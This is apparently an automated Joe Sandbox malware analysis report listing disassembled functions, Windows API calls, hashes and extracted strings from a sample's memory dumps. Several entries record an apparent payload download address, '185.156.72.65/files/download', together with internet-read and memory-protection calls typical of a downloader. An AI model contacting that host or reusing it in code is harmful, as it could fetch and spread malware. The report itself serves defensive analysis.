                      • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                      • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 004150D5
                      • __alloca_probe_16.LIBCMT ref: 0041519E
                      • __freea.LIBCMT ref: 00415205
                        • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      • __freea.LIBCMT ref: 00415218
                      • __freea.LIBCMT ref: 00415225
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                      • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04942D5F
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04942D74
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04942D82
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04942D9D
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04942DBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                      • String ID:
                      • API String ID: 2509773233-0
                      • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction ID: 175afa162c95cfeadb4e2da24863592be78a5309dce3feafc95c42142ec1e7ff
                      • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction Fuzzy Hash: D9310532B00004AFDB149F68DC40FAAB7A8FF88305F1541F9F905DB291DB31A906CB94
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004013BB
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 2296764815-3011832937
                      • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                      • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04941622
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 4132704954-3011832937
                      • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction ID: 7258e5586a0b6b714f836cbf843b993ade46c735d2d5c04f1d01758bfd09cb40
                      • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction Fuzzy Hash: 47217C70F003448AE730DF79E80ABA6B3A0FF95308FA44279D8485B261DBB565C6CB19
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                      • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                      • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                      APIs
                      • GetConsoleOutputCP.KERNEL32(79D989F6,00000000,00000000,00000000), ref: 0041972F
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                      • GetLastError.KERNEL32 ref: 00419A6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                      • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                      APIs
                      • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04959996
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04959BE8
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04959C2E
                      • GetLastError.KERNEL32 ref: 04959CD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction ID: ac4ae00053e98a5e680b4bc9fec160e7e4d4493f6071aace53cde3eeb8c891ce
                      • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction Fuzzy Hash: FED15DB5E00248DFDB15CFA8D8809EDBBF5FF49314F24456AE85AEB261D630A941CB50
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04941C6C
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04941C8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID:
                      • API String ID: 3197321146-0
                      • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction ID: 4dca8ee12fc941249610a2b83ebfa9bb9639dbb1437fa16a71cb8a2fad8c4bfb
                      • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction Fuzzy Hash: F3C139B09002199FEB24DF64CC89FE9B7B8FF89304F1041E9E509A7290D775AA85CF95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: bdde06f235a269d078468b2cf144f212e7cf328a5c8ff44ed6905d2f0b42bfa6
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8251D3B2605606AFEB298F10D888FBB73A9EFC4314F14497DDA054B690E731FA50DB90
                      APIs
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • GetLastError.KERNEL32 ref: 00417548
                      • __dosmaperr.LIBCMT ref: 0041754F
                      • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                      • __dosmaperr.LIBCMT ref: 00417590
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                      APIs
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • GetLastError.KERNEL32 ref: 049577AF
                      • __dosmaperr.LIBCMT ref: 049577B6
                      • GetLastError.KERNEL32(?,?,?,?), ref: 049577F0
                      • __dosmaperr.LIBCMT ref: 049577F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: ff8533bfb572cb16cd7e42a707f9002909eb208d62e8c759a9d0a38b944d5ae3
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 87218675600615AFEB11EFA1D880D6A77ADFF84268B208579ED1997260D731FD00C760
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: a45ec91265a130491ca744ceba9d666514f598402c535a81d2d6f777d8ba8db7
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E8219375A04205AFEB20EF65DC81E7B77AEAF842687204935FD1A97170E774FC4287A0
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049536EF,0494381E,?,00000000,04942AA0,04942AA2,?,04953868,00000022,00420B0C,00422950,00422958,04942AA0), ref: 049536A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: dc75c547a42f12a9f289368585f08454ecf7689698170e341f7030a169091c8b
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: F821C331A02611ABC731DB65EC42A5A7BA99B427E0B254238ED06A73B1DB30FD05C794
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049586F4
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: da794a8fd2d3a790ccbef012f21260be0a07f8a954a768ae26b22ec8f6b15c65
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 03118EB66015197EA721FB765C88CAF2EADCEC91A87210534FD06A1120FA60FE1287B5
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000), ref: 0495CEA6
                      • GetLastError.KERNEL32(?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000,?,0495A2C8,?), ref: 0495CEB2
                        • Part of subcall function 0495CE78: CloseHandle.KERNEL32(0042CA30,0495CEC2,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000), ref: 0495CE88
                      • ___initconout.LIBCMT ref: 0495CEC2
                        • Part of subcall function 0495CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0495CE69,0495CAF3,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 89c4c1b7f98522a9b69b08b15cfafe70a43135fa4217921e32848bd1af09b4f5
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: B8F0303A540258BBCF229FD5EC08ACE3F26FF486A1B518030FE1996130D732AC259BD4
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0494BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0494BB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: f8fd4814fa1228670a746e36af1c5dbbd4f4a5f8c078400c8c653d4389a200f2
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 1941A130A00219AFDF10DF69C884EAEBBF5AF85328F148575E8146B3A5D731FA15CB90
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0494C32C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
